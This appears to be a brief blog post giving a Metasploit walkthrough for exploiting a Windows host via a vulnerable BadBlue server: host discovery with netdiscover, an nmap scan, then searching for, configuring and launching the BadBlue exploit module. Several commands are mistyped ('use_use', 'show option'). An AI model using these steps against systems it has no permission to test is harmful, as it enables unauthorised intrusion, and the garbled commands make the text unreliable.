Windows Hacking (Exploitation Using Badblue) in Kali Linux
Windows Exploitation using Badblue:-
= netdiscover //info-gathering.
= nmap -A_ip //scanning to check port status.
= msfconsole //launch metasploit framework.
= search badblue //check badblue version.
= use_use latest version of badblue //path wich is exploitable.
= show option //check module options.
= set RHOST _target ip //set target ip address.
= set RPORT _target port no//set target port .
= show options //cross check about module options.
= exploit //exploit windows.
Comments
Post a Comment